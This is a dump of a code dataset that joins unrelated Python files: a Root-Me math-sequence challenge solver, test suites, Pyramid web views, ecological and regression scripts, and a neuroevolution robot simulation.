    \")[2]\n# recup2Iteration = recupIteration.split(\"\")[1]\n# iteration = recup2Iteration.split(\"\")[0].strip()\n#\n# p1 = Un1.split(\")\")\n# p1s = p1[0].replace(\"(\",\"\")\n# nombreP1 = p1s.split(\"+\")[0]\n# nombreP1 = nombreP1.strip()\n#\n# p2 = Un1.split(\"(\")[2]\n# p2s = p2.replace(\")\",\"\")\n# nombreP2 = p2s.split(\"*\")[1]\n# nombreP2 = nombreP2.strip()\n#\n# def u(n):\n# U = int(Un0)\n# for i in range (0,n+1):\n# U =(int(nombreP1)+U)-(i*int(nombreP2))\n# #endfor\n# return U\n# #enddef\n# res = u(int(iteration))\n#\n# data = {\"result\":str(res)}\n# reponse = s.get(\"http://challenge01.root-me.org/programmation/ch1/ep1_v.php\", params=data)\n#\n# print(reponse.url)\n# print(reponse.text)\n# print(reponse.cookies)\n#\n# print(r.cookies)\n\ns = requests.session()\nresponse = s.get(\"http://challenge01.root-me.org/programmation/ch1/\")\n\ndiv = response.text.split(\"\")\n\nUn1 = div[1].split(\"
    \")[0].split(\"=\")[1].replace('','').replace('','').strip().replace('[','(').replace(']',')')\nUn0 = div[1].split(\"
    \")[1].split(\"=\")[1].strip()\niteration = div[1].split(\"
    \")[2].split(\"\")[1].split(\"\")[0].strip()\n\nnombreP1 = Un1.split(\")\")[0].replace(\"(\",\"\").split(\"+\")[0].strip()\nnombreP2 = Un1.split(\"(\")[2].replace(\")\",\"\").split(\"*\")[1].strip()\n\ndef u(n):\n U = int(Un0)\n for i in range (0,n):\n U =(int(nombreP1)+U)-(i*int(nombreP2))\n #endfor\n return U\n#enddef\nres = u(int(iteration))\n\nresponse2 = s.get('http://challenge01.root-me.org/programmation/ch1/ep1_v.php?result=' + str(res))\n\nprint(response2.text)","sub_path":"RootMe/Suite Mathematique.py","file_name":"Suite Mathematique.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"268032922","text":"#\n# Copyright (C) 2012 - 2021 Satoru SATOH \n# SPDX-License-Identifier: MIT\n#\n# pylint: disable=missing-docstring\nr\"\"\"Test cases for anyconfig.utils.files.\n\"\"\"\nimport pathlib\nimport tempfile\nimport unittest\n\nimport anyconfig.utils.files as TT\n\nfrom anyconfig.ioinfo import make as ioinfo_make\n\n\nclass TestCase(unittest.TestCase):\n\n def test_get_file_extension(self):\n ies = (\n ('', ''),\n ('/a/b/c', ''),\n ('/a/b/c.txt', 'txt'),\n ('/a/b/c/d.txt.gz', 'gz'),\n )\n for inp, exp in ies:\n self.assertEqual(TT.get_file_extension(inp), exp)\n\n def test_get_path_from_stream(self):\n this = __file__\n\n with pathlib.Path(this).open() as strm:\n self.assertEqual(TT.get_path_from_stream(strm), this)\n\n with self.assertRaises(ValueError):\n TT.get_path_from_stream(this)\n\n self.assertEqual(TT.get_path_from_stream(this, safe=True), '')\n\n def test_split_path_by_marker(self):\n ies = (\n ('a.txt', ('a.txt', '')),\n ('*.txt', ('', '*.txt')),\n ('a/*.txt', ('a', '*.txt')),\n ('a/b/*.txt', ('a/b', '*.txt')),\n ('a/b/*/*.txt', ('a/b', '*/*.txt')),\n )\n for inp, exp in ies:\n self.assertEqual(TT.split_path_by_marker(inp), exp)\n\n def test_expand_paths(self):\n with tempfile.TemporaryDirectory() as workdir:\n tdir = pathlib.Path(str(workdir)) / 'a' / 'b' / 'c'\n tdir.mkdir(parents=True)\n\n pathlib.Path(tdir / 'd.txt').touch()\n pathlib.Path(tdir / 'e.txt').touch()\n pathlib.Path(tdir / 'f.json').write_text(\"{'a': 1}\\n\")\n\n path = tdir / 'd.txt'\n for inp, exp in ((str(path), [path]),\n (path, [path]),\n (ioinfo_make(path), [ioinfo_make(path)]),\n (tdir / '*.txt',\n [tdir / 'd.txt', tdir / 'e.txt']),\n (tdir.parent / '**' / '*.txt',\n [tdir / 'd.txt', tdir / 'e.txt']),\n (tdir.parent / '**' / '*.*',\n [tdir / 'd.txt',\n tdir / 'e.txt',\n tdir / 'f.json']),\n ([tdir / 'e.txt', tdir / 'd.txt'],\n [tdir / 'e.txt', tdir / 'd.txt'])\n ):\n self.assertEqual(\n TT.expand_paths(inp), exp, f'{inp!r} vs. {exp!r}'\n )\n\n with path.open() as fobj:\n self.assertEqual(TT.expand_paths(fobj), [fobj])\n\n def test_are_same_file_types(self):\n fun = TT.are_same_file_types\n this_py = pathlib.Path(__file__)\n this = ioinfo_make(this_py)\n other = ioinfo_make(this_py.parent / 'setup.cfg')\n\n for inp, exp in (([], False),\n ([this], True),\n ([this, this], True),\n ([this, other], False),\n ([this, other], False),\n ):\n (self.assertTrue if exp else self.assertFalse)(fun(inp))\n\n# vim:sw=4:ts=4:et:\n","sub_path":"tests/utils/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"545479519","text":"# -*- coding: utf-8 -*--\nfrom pyramid.view import view_config\nimport pyramid.httpexceptions as exc\n\nfrom infolica.exceptions.custom_error import CustomError\nfrom infolica.models import Constant\nfrom infolica.models.models import ControleGeometre, Operateur\nfrom infolica.scripts.utils import Utils\nfrom infolica.scripts.authentication import check_connected\n\n\n@view_config(route_name='controle_geometre_by_affaire_id', request_method='GET', renderer='json')\ndef controle_geometre_by_affaire_id_view(request):\n \"\"\"\n Return controle_geometre by affaire_id\n \"\"\"\n # Check connected\n if not check_connected(request):\n raise exc.HTTPForbidden()\n\n # Get controle mutation id\n affaire_id = request.matchdict['id']\n query = request.dbsession.query(ControleGeometre).filter(\n ControleGeometre.affaire_id == affaire_id).first()\n\n if query is None:\n return None\n \n operateur_prenom_nom = None\n\n \n # get signature_operateur\n if not query.operateur_id is None:\n operateur = request.dbsession.query(\n Operateur\n ).filter(\n Operateur.id == query.operateur_id\n ).first()\n operateur_prenom_nom = ' '.join([operateur.prenom, operateur.nom])\n\n\n ctrl = Utils.serialize_one(query)\n\n ctrl['operateur_prenom_nom'] = operateur_prenom_nom\n\n return ctrl\n\n\n@view_config(route_name='controle_geometre', request_method='POST', renderer='json')\n@view_config(route_name='controle_geometre_s', request_method='POST', renderer='json')\ndef controle_geometre_new_view(request):\n \"\"\"\n Add new controle_geometre\n \"\"\"\n # Check authorization\n if not Utils.has_permission(request, request.registry.settings['affaire_controle_geometre_edition']):\n raise exc.HTTPForbidden()\n\n Utils.addNewRecord(request, ControleGeometre)\n\n return Utils.get_data_save_response(Constant.SUCCESS_SAVE.format(ControleGeometre.__tablename__))\n\n\n@view_config(route_name='controle_geometre', request_method='PUT', renderer='json')\n@view_config(route_name='controle_geometre_s', request_method='PUT', renderer='json')\ndef controle_geometre_update_view(request):\n \"\"\"\n Update controle_geometre\n \"\"\"\n # Check authorization\n if not Utils.has_permission(request, request.registry.settings['affaire_controle_geometre_edition']):\n raise exc.HTTPForbidden()\n\n # Get controle mutation id\n id = request.params['id'] if 'id' in request.params else None\n\n # Get controle mutation record\n record = request.dbsession.query(ControleGeometre).filter(\n ControleGeometre.id == id).first()\n\n if not record:\n raise CustomError(\n CustomError.RECORD_WITH_ID_NOT_FOUND.format(ControleGeometre.__tablename__, id))\n \n record = Utils.set_model_record(record, request.params)\n\n return Utils.get_data_save_response(Constant.SUCCESS_SAVE.format(ControleGeometre.__tablename__))\n\n","sub_path":"back/infolica/views/controle_geometre.py","file_name":"controle_geometre.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"138732801","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis script runs the discrete-time version of the Lotka-Volterra model and plots\nthe results in two graphs saved to ../Results.\n\"\"\"\n\n__author__ = 'Group 4'\n__version__ = '0.0.1'\n\n# imports\nimport numpy as np\nimport matplotlib.pylab as p\nimport sys\n\ndef main(r = 1.0, a = 0.1, z = 1.5, e = 0.75):\n \"\"\"\n Calculates the population density at each time step using the discrete-time\n version of the Lotka-Volterra model\n Plots the results in two graphs saved to ../Results/. \n First, a change in resource and consumer density over time, and second, the \n change in population density of consumer with respect to the change in \n population density of resource\n \n Parameters:\n r (float): intrinsic (per-capita) growth rate of the resource \n population (time ^ -1)\n a (float): per-capita \"search rate\" for the resource\n (area x time ^ -1) multiplied by its attack success\n probability, which determines the encounter and \n consumption rate of the consumer on the resource\n z (float): mortality rate (time ^ -1)\n e (float): consumer's efficiency (a fraction) in converting \n resource to consumer biomass\n \"\"\"\n\n # define time vector, integrate from time point 0 to 15, using 1000\n # sub-divisions of time\n # note that units of time are arbitrary here\n t = np.linspace(0, 15, 1000)\n\n # set initial conditions for two populations (10 resources and 5 consumers per \n # unit area), and convert the two into an array (because our dCR_dt function\n # takes an array as input)\n R0 = 10\n C0 = 5\n\n # set K, which is the carrying capacity\n K = 33\n\n # preallocate list\n popu = np.zeros([len(t),2])\n \n # discrete time version of LV model\n for i in range(len(t)): \n # Looping through both columns at the same time\n Rn = R0 * (1 + r * (1- R0/K) - a * C0)\n Cn = C0 * (1 - z + e * a * R0)\n R0 = Rn\n C0 = Cn\n popu[i,:]= [Rn,Cn]\n \n # visualize with matplotlib\n f1 = p.figure()\n p.plot(t, popu[:,0], 'g-', label = \"Resource density\") # plot\n p.plot(t, popu[:,1], 'b-', label = \"Consumer density\")\n p.grid()\n p.legend(loc = \"best\")\n p.xlabel(\"Time\")\n p.ylabel(\"Population density\")\n p.suptitle(\"Consumer-Resource population dynamics\")\n p.title(\"r = %.2f, a = %.2f, z = %.2f, e = %.2f\" %(r, a, z, e),\n fontsize = 8)\n # p.show()\n f1.savefig(\"../Results/LV_model3.pdf\") # save figure\n\n # plot of Consumer density against Resource density\n f2 = p.figure()\n p.plot(popu[:,0], popu[:,1], 'r-')\n p.grid()\n p.xlabel(\"Resource density\")\n p.ylabel(\"Consumer density\")\n p.suptitle(\"Consumer-Resource population dynamics\")\n p.title(\"r = %.2f, a = %.2f, z = %.2f, e = %.2f\" %(r, a, z, e),\n fontsize = 8)\n # p.show()\n f2.savefig(\"../Results/LV_model3-1.pdf\")\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 5:\n # assign sys argvs to parameter values\n r = float(sys.argv[1])\n a = float(sys.argv[2])\n z = float(sys.argv[3])\n e = float(sys.argv[4])\n # K = float(sys.argv[5])\n main(r, a, z, e)\n sys.exit()\n else:\n print(\"Lacking user inputs, using defaults\")\n main()\n sys.exit()","sub_path":"Week7/Code/LV3.py","file_name":"LV3.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"374320278","text":"class Car(object):\n\tdef __init__(self, cname=\"General\", cmodel=\"GM\", ctype=None ):\n\t\tself.name = cname\n\t\tself.model = cmodel\n\t\tself.type = ctype\n\t\tself.speed = 0\n\n\t\tif self.name == 'Porshe' or self.name =='Koenigsegg':\n\t\t\tself.num_of_doors = 2\n\t\telse:\n\t\t\tself.num_of_doors = 4\n\n\t\tif self.type == 'trailer':\n\t\t\tself.num_of_wheels = 8\n\t\telse:\n\t\t\tself.num_of_wheels = 4\n\n\n\tdef is_saloon(self):\n\t\tif self.type != 'trailer':\n\t\t\tself.type == 'saloon'\n\t\t\treturn True\n\t\treturn False\n\n\tdef drive(self,curspeed):\n\t\tif curspeed == 7:\n\t\t\tself.speed = 77\n\t\telif curspeed == 3:\n\t\t\tself.speed = 1000\n\n\t\treturn self\n\n\n\t\t","sub_path":"carclass.py","file_name":"carclass.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"383629878","text":"from common.http_request_new import Request\nfrom common.m_process import mprocess\nimport json\npath=\"D:\\\\Users\\\\lijq36\\Desktop\\\\2\"\nresult_path=\"E:\\\\test\\\\Result.txt\"\n\n\n\ndef nlu(each):\n url = \"https://nlu.sit.aimidea.cn:22012/nlu/v1\"\n data = {\"currentUtterance\": \"这款空调有什么特色\", \"sourceDevice\": \"空调\", \"multiDialog\": \"false\", \"slotMiss\": \"false\",\n \"suites\": [\"default\"], \"deviceId\": \"3141482994683870\", \"userGroup\": \"meiju\",\n \"userGroupCredential\": \"b82063f4-d39b-4940-91c3-5b67d741b4d3\"}\n data[\"currentUtterance\"] = each\n result = Request().requests(url, data, 'post')\n result = result.json()\n classifier = result['classifier']\n if classifier != \"publicDomain\":\n print(each + \":\"+classifier)\n with open(result_path, 'a', encoding='utf8') as f:\n f.write(each+\":\"+str(result)+'\\n')\n # f.close()\n else:\n print(each + \":\"+classifier)\n\n\nif __name__==\"__main__\":\n path1 = \"D:\\\\Users\\\\lijq36\\Desktop\\\\2\"\n with open(path1, 'r', encoding='utf8') as f:\n a = f.readlines()\n for i in range(len(a)):\n nlu(a[i].replace(\"\\n\",\"\"))\n # mprocess(nlu, a,Poolnum=1)\n\n #\n","sub_path":"AITEST/demo/demo4.py","file_name":"demo4.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"618449578","text":"import sys\nimport pygame\n\nclass GraphicsHandler:\n\n\t_bg_color = (255, 255, 255)\n\tblack = (0, 0, 0)\n\tscreen = None\n\n\t@staticmethod\n\tdef initialize_board(_type = 1):\n\n\t\t#pygame.init()\n\t\t#GraphicsHandler.screen = pygame.display.set_mode(size)\n\t\tGraphicsHandler.screen.fill(GraphicsHandler._bg_color)\n\t\tif _type == 1:\n\t\t\tpygame.draw.line(GraphicsHandler.screen, GraphicsHandler.black, [200,50], [200,550], 5)\n\t\t\tpygame.draw.line(GraphicsHandler.screen, GraphicsHandler.black, [400,50], [400,550], 5)\n\t\t\tpygame.draw.line(GraphicsHandler.screen, GraphicsHandler.black, [50,200], [550,200], 5)\n\t\t\tpygame.draw.line(GraphicsHandler.screen, GraphicsHandler.black, [50,400], [550,400], 5)\n\n\t\tpygame.display.flip()\n\n\t@staticmethod\n\tdef initialize_game(size = [600, 600]):\n\t\tpygame.init()\n\t\tGraphicsHandler.screen = pygame.display.set_mode(size)\n\t\tGraphicsHandler.screen.fill(GraphicsHandler._bg_color)\n\t\tfont = pygame.font.Font(None, 35)\n\t\ttext_title = font.render(\"TIC TAC TOE\", 5, GraphicsHandler.black)\n\t\ttitle = GraphicsHandler.screen.blit(text_title, (200,100))\n\t\tpygame.display.flip()\n\n\t\trunning = True\n\n\t\twhile running:\n\t\t\tevent = pygame.event.poll()\n\t\t\tif event.type == pygame.QUIT: \n\t\t\t\tsys.exit()\n\t\t\telif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n\t\t\t\tmouse_pos = pygame.mouse.get_pos()\n\t\t\t\tif title.collidepoint(mouse_pos):\n\t\t\t\t\tGraphicsHandler.initialize_board()\n\t\t\t\t\trunning = False\n\n\n","sub_path":"graphicshandler.py","file_name":"graphicshandler.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"516749733","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 26 09:30:52 2017\n\n@author: jack.gang\n\"\"\"\n\nimport pandas as pd\nfrom patsy import dmatrices\nimport numpy as np\nimport csv\n#from sklearn.cluster import KMeans\n\npath = 'train.csv'\npathUniv = open(path)\ntrain = pd.read_csv(pathUniv, sep=',', engine='python')\npathUniv.close()\n\n# clean up data\n#meanAge = np.nanmean(train['Age'])\n\nfor index, row in train.iterrows():\n# if row['Age'] != row['Age']:\n# train.set_value(index, 'Age', meanAge)\n \n if row['Age'] < 16 or row['Age'] > 75:\n train.set_value(index, 'Age', 1)\n else:\n train.set_value(index, 'Age', 0)\n \n# if row['Parch'] > 0:\n# train.set_value(index, 'Age', 0)\n# if row['SibSp'] > 0:\n# train.set_value(index, 'SibSp', 1)\n# if row['Parch'] > 0:\n# train.set_value(index, 'Parch', 1)\n\n# model\noutcome, predictors = dmatrices(\"Survived ~ C(Pclass)-1 + C(Sex) + C(Age) + SibSp + Parch + C(Embarked) + Fare\", train)\n\nbetas = np.linalg.lstsq(predictors, outcome)[0].ravel()\nbetaDict = {}\nfor name, beta in zip(predictors.design_info.column_names, betas):\n betaDict[name] = beta\n\n# training\nfor index, row in train.iterrows():\n \n estimate = row['SibSp']*betaDict['SibSp'] + row['Parch']*betaDict['Parch'] + row['Fare']*betaDict['Fare']\n \n if row['Age'] == 1:\n estimate += betaDict['C(Age)[T.1.0]']\n \n if row['Sex'] == 'male':\n estimate += betaDict['C(Sex)[T.male]']\n \n if row['Pclass'] == 1:\n estimate += betaDict['C(Pclass)[1]']\n elif row['Pclass'] == 2:\n estimate += betaDict['C(Pclass)[2]']\n else:\n estimate += betaDict['C(Pclass)[3]']\n \n if row['Embarked'] == 'Q':\n estimate += betaDict['C(Embarked)[T.Q]']\n elif row['Embarked'] == 'S':\n estimate += betaDict['C(Embarked)[T.S]']\n \n train.set_value(index, 'estimate', min(1, round(estimate)))\n\nprint(\"training:\", (len(train) - sum(abs(train['Survived'] - train['estimate']))) / len(train))\n\n# test\n#path = 'test.csv'\n#pathUniv = open(path)\n#test = pd.read_csv(pathUniv, sep=',', engine='python')\n#pathUniv.close()\n#\n#for index, row in test.iterrows():\n# \n# estimate = row['Age']*betaDict['Age'] + row['SibSp']*betaDict['SibSp'] + row['Parch']*betaDict['Parch'] + row['Fare']*betaDict['Fare']\n# \n# if row['Sex'] == 'male':\n# estimate += betaDict['C(Sex)[T.male]']\n# \n# if row['Pclass'] == 1:\n# estimate += betaDict['C(Pclass)[1]']\n# elif row['Pclass'] == 2:\n# estimate += betaDict['C(Pclass)[2]']\n# else:\n# estimate += betaDict['C(Pclass)[3]']\n# \n# if row['Embarked'] == 'Q':\n# estimate += betaDict['C(Embarked)[T.Q]']\n# elif row['Embarked'] == 'S':\n# estimate += betaDict['C(Embarked)[T.S]']\n# \n# test.set_value(index, 'Survived', min(1, round(estimate)))\n#\n#test['Survived'] = test['Survived'].astype(int)\n#test[['PassengerId','Survived']].to_csv(\"result2.csv\", header = ['PassengerId','Survived'], index = False, quoting = csv.QUOTE_NONE, quotechar = '')\n","sub_path":"Titanic/Titanic.py","file_name":"Titanic.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"231931442","text":"#python imports.\nimport requests\n\n# django imports.\nfrom django.conf import settings\n\n#app level imports.\nfrom .exceptions import NetworkException\n\nURL = settings.LOCATIONIQ_URL\n\ndef getlatlon(address, key, url=URL):\n\t\"\"\"\n\tThis function is used to get the latitude and longitude address.\n\t\"\"\"\n\tPARAMS = {}\n\tPARAMS['key'] = key\n\tPARAMS['q'] = address\n\n\ttry: \n\t\tresponse = requests.get(url=url, params=PARAMS)\n\t\tif response.status_code == 200:\n\t\t\tdata = response.json()\n\t\t\tlat = data[0]['lat'] \n\t\t\tlon = data[0]['lon']\n\t\t\treturn lat, lon\n\n\texcept Exception as e:\n\t\tprint(str(e))\n\t\traise NetworkException(errors=str(e))\n\t\t\n\treturn 0, 0\n\n\n\n\n\n\n\n\n\n\n","sub_path":"geographic/libs/locationiq.py","file_name":"locationiq.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"34400061","text":"import aiger_bv as BV\n\nimport aiger_coins as C\n\n\ndef test_pcirc_smoke():\n x = BV.uatom(3, 'x')\n y = BV.uatom(3, 'y')\n z = (x + y).with_output('z')\n\n pcirc = C.PCirc(circ=z, dist_map={'y': lambda _: 1/3}) \\\n .assume(y <= 2)\n\n rvar = C.RandomVarCirc(pcirc)\n\n # Warning. May be flaky.\n for i in range(3):\n assert 3 <= rvar({'x': 3}) <= 5\n\n\ndef test_pcirc_relabel():\n x = BV.uatom(3, 'x')\n pcirc = C.PCirc(circ=x, dist_map={'x': lambda _: 1/3})\n pcirc2 = pcirc['i', {'x': 'y'}]\n assert pcirc2.inputs == set()\n assert pcirc2.circ.inputs == {'y'}\n assert pcirc2.dist_map['y'](0) == 1/3\n\n\ndef test_seq_compose():\n x = BV.uatom(3, 'x').with_output('y')\n y = BV.uatom(3, 'y').with_output('y')\n pcirc = C.PCirc(circ=y)\n pcirc2 = C.PCirc(circ=x, dist_map={'x': lambda _: 1/3}) >> pcirc\n pcirc3 = pcirc << C.PCirc(circ=x, dist_map={'x': lambda _: 1/3})\n\n assert pcirc2.outputs == pcirc3.outputs == {'y'}\n assert pcirc2.inputs == pcirc3.inputs == set()\n assert pcirc2.dist_map['x'](0) == pcirc3.dist_map['x'](0) == 1/3\n\n assert 0 <= pcirc2({})[0]['y'] <= 7\n\n pcirc4 = C.PCirc(circ=(x + 1).with_output('y')) >> pcirc\n assert pcirc4({'x': 0})[0] == {'y': 1}\n\n\ndef test_par_compose():\n x = BV.uatom(3, 'x').with_output('x')\n y = BV.uatom(3, 'y').with_output('y')\n\n pcirc_x = C.PCirc(circ=x)\n pcirc_y = C.PCirc(circ=y, dist_map={'y': lambda _: 1/3})\n\n pcirc_xy = pcirc_x | pcirc_y\n assert pcirc_xy.inputs == {'x'}\n assert pcirc_xy.outputs == {'x', 'y'}\n assert pcirc_xy.dist_map['y'](0) == 1/3\n\n\ndef test_loopback_unroll():\n x = BV.uatom(3, 'x')\n y = BV.uatom(3, 'y')\n adder = (x + y).with_output('z')\n\n pcirc = C.PCirc(adder, dist_map={'y': lambda _: 1/3}) \\\n .assume((y > 0) & (y < 4))\n\n pcirc2 = pcirc.loopback({\n 'input': 'x',\n 'output': 'z',\n 'init': 4,\n 'keep_output': True,\n })\n\n assert pcirc2.inputs == set()\n assert pcirc2.outputs == {'z'}\n assert len(pcirc2.latches) == 1\n assert 4 < pcirc2({})[0]['z'] < 8\n\n pcirc3 = pcirc2.unroll(3)\n assert pcirc3.inputs == set()\n assert pcirc3.outputs == {'z##time_1', 'z##time_2', 'z##time_3'}\n\n pcirc4 = pcirc2.unroll(3, only_last_outputs=True)\n assert pcirc4.outputs == {'z##time_3'}\n pcirc4({}) # Could technically be any value due to roll back.\n","sub_path":"tests/test_pcirc.py","file_name":"test_pcirc.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"419485740","text":"from unittest import TestCase\n\nimport pandas as pd\n\nfrom pycta.performance.periods import periods, period_returns\nfrom test.config import read_series\n\n\n\nimport pandas.util.testing as pdt\n\nclass TestPeriods(TestCase):\n def test_periods(self):\n p = periods(today=pd.Timestamp(\"2015-05-01\"))\n self.assertEqual(p[\"Two weeks\"].start, pd.Timestamp(\"2015-04-17\"))\n self.assertEqual(p[\"Two weeks\"].end, pd.Timestamp(\"2015-05-01\"))\n\n def test_period_returns(self):\n p = periods(today=pd.Timestamp(\"2015-05-01\"))\n s = read_series(\"ts.csv\", parse_dates=True).pct_change().dropna()\n x = 100*period_returns(returns=s, offset=p)\n self.assertAlmostEqual(x[\"Three Years\"], 1.1645579858904798 , places=10)\n\n def test_periods_more(self):\n s = read_series(\"ts.csv\", parse_dates=True).pct_change().dropna()\n y = period_returns(s, offset=periods(today=s.index[-1]))\n pdt.assert_series_equal(y, read_series(\"periods.csv\", parse_dates=False), check_names=False)\n","sub_path":"test/test_performance/test_periods.py","file_name":"test_periods.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"448223423","text":"import sys\r\nimport random\r\nimport subprocess\r\n#import pygame\r\n#from pygame.locals import *\r\nimport pymunk\r\nimport math\r\nfrom entities import *\r\nfrom shapes import *\r\nfrom network import *\r\nfrom gnarl import *\r\nfrom functools import partial\r\n\r\nWINDOW_SIZE = (1100,600)\r\n\r\ndef init_terrain():\r\n terrain = Terrain()\r\n terrain.add_segment(WINDOW_SIZE[1]-10, math.radians(-90))\r\n terrain.add_segment(300, math.radians(0))\r\n terrain.add_segment(100, math.radians(5))\r\n terrain.add_segment(100, math.radians(10))\r\n terrain.add_segment(100, math.radians(15))\r\n terrain.add_segment(100, math.radians(10))\r\n terrain.add_segment(100, math.radians(5))\r\n terrain.add_segment(300, math.radians(0))\r\n terrain.add_segment(WINDOW_SIZE[1], math.radians(90)) \r\n terrain.rasterize((2, WINDOW_SIZE[1]))\r\n return terrain\r\n\r\ndef init_robot():\r\n shape = create_box((30, 30))\r\n shape.body.position = (0, 0)\r\n #shape.color = pygame.color.THECOLORS[\"blue\"]\r\n trunk = Bone(shape)\r\n\r\n shape = create_box((30, 40))\r\n shape.body.position = (0, -25)\r\n #shape.color = pygame.color.THECOLORS[\"green\"]\r\n thigh1 = Bone(shape)\r\n\r\n shape = create_box((30, 40))\r\n shape.body.position = (0, -25)\r\n #shape.color = pygame.color.THECOLORS[\"green\"]\r\n thigh2 = Bone(shape)\r\n\r\n shape = create_box((20, 50))\r\n shape.body.position = (0, -45)\r\n #shape.color = pygame.color.THECOLORS[\"green\"]\r\n leg1 = Bone(shape)\r\n\r\n shape = create_box((20, 50))\r\n shape.body.position = (0, -45)\r\n #shape.color = pygame.color.THECOLORS[\"green\"]\r\n leg2 = Bone(shape)\r\n\r\n shape = create_box((44, 10))\r\n shape.body.position = (12, -60)\r\n #shape.color = pygame.color.THECOLORS[\"red\"]\r\n foot1 = Bone(shape)\r\n\r\n shape = create_box((44, 10))\r\n shape.body.position = (12, -60)\r\n #shape.color = pygame.color.THECOLORS[\"red\"]\r\n foot2 = Bone(shape)\r\n \r\n hip1 = trunk.join(thigh1, (0, -10), (0, 15))\r\n hip2 = trunk.join(thigh2, (0, -10), (0, 15))\r\n knee1 = thigh1.join(leg1, (0, -15), (0, 20))\r\n knee2 = thigh2.join(leg2, (0, -15), (0, 20))\r\n ankle1 = leg1.join(foot1, (-5, -20), (-17, 0))\r\n ankle2 = leg2.join(foot2, (-5, -20), (-17, 0))\r\n\r\n robot = Robot()\r\n \r\n robot.add_bone(trunk)\r\n robot.add_bone(thigh1)\r\n robot.add_bone(thigh2)\r\n robot.add_bone(leg1)\r\n robot.add_bone(leg2)\r\n robot.add_bone(foot1)\r\n robot.add_bone(foot2)\r\n \r\n robot.add_joint(hip1)\r\n robot.add_joint(hip2)\r\n robot.add_joint(knee1)\r\n robot.add_joint(knee2)\r\n robot.add_joint(ankle1)\r\n robot.add_joint(ankle2)\r\n \r\n return robot\r\n\r\ndef _init_robot():\r\n shape = create_box((30, 20))\r\n shape.body.position = (0, 0)\r\n #shape.color = pygame.color.THECOLORS[\"blue\"]\r\n trunk = Bone(shape)\r\n\r\n shape = create_box((10, 70))\r\n shape.body.position = (-10, -35)\r\n #shape.color = pygame.color.THECOLORS[\"blue\"]\r\n leg1 = Bone(shape)\r\n\r\n shape = create_box((10, 70))\r\n shape.body.position = (10, -35)\r\n #shape.color = pygame.color.THECOLORS[\"blue\"]\r\n leg2 = Bone(shape)\r\n \r\n hip1 = trunk.join(leg1, (-10, -5), (0, 30))\r\n hip2 = trunk.join(leg2, (10, -5), (0, 30))\r\n \r\n robot = Robot()\r\n \r\n robot.add_bone(trunk)\r\n robot.add_bone(leg1)\r\n robot.add_bone(leg2)\r\n \r\n robot.add_joint(hip1)\r\n robot.add_joint(hip2)\r\n \r\n return robot\r\n\r\ndef init_population(robot, num):\r\n networks = []\r\n for i in range(0, num):\r\n rnn = init_network(robot)\r\n randomize_network(rnn)\r\n networks.append(rnn)\r\n return networks\r\n \r\ndef distance(a, b):\r\n return math.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)\r\n\r\nclass Processor:\r\n def __init__(self):\r\n self.iteration = 0\r\n\r\n def process_data(self, rnn_list):\r\n with open(\"data\", \"a\") as f:\r\n for rnn in rnn_list:\r\n f.write(\"{},{},{},{},{}\\n\".format(rnn.fitness, list(rnn.neurons.keys()), rnn.edges, rnn.input_layer, rnn.output_layer))\r\n f.write(\"------\")\r\n subprocess.run([\"git\", \"add\", \"data\"])\r\n subprocess.run([\"git\", \"commit\", \"-m\", \"\\\"updating data [{}]\\\"\".format(self.iteration)])\r\n subprocess.run([\"git\", \"push\", \"origin\", \"master\"])\r\n self.iteration += 1\r\n \r\ndef main():\r\n #pygame.init()\r\n #screen = pygame.display.set_mode(WINDOW_SIZE)\r\n #pygame.display.set_caption(\"SKS\")\r\n #clock = pygame.time.Clock()\r\n\r\n #draw_options = pymunk.pygame_util.DrawOptions(screen)\r\n\r\n terrain = init_terrain()\r\n environment = Environment(terrain)\r\n\r\n goal = Goal(950, 120)\r\n environment.add(goal)\r\n\r\n robot = init_robot()\r\n robot.rasterize((100, 100))\r\n robot.add_sensor(lambda a=robot.center_of_gravity, b=goal.shape.body.position: distance(a, b)/1000)\r\n \r\n random.seed()\r\n\r\n networks = init_population(robot, num=200)\r\n \r\n def fitness(network):\r\n if not network.processed:\r\n environment.add(robot)\r\n robot.save_state()\r\n\r\n elapsed = 0.0\r\n while elapsed <= 5.0:\r\n #for event in pygame.event.get():\r\n # if event.type == QUIT:\r\n # sys.exit(0)\r\n # elif event.type == KEYDOWN and event.key == K_ESCAPE:\r\n # sys.exit(0)\r\n\r\n network.process()\r\n \r\n environment.space.step(1/50.0)\r\n \r\n #screen.fill((255,255,255))\r\n \r\n #environment.space.debug_draw(draw_options)\r\n\r\n #pygame.display.flip()\r\n #clock.tick(50)\r\n\r\n elapsed += 1/50.0\r\n\r\n network.processed = True\r\n network.fitness = 1 - distance(robot.center_of_gravity, goal.shape.body.position)/1000\r\n \r\n environment.remove(robot)\r\n robot.load_state()\r\n\r\n return network.fitness 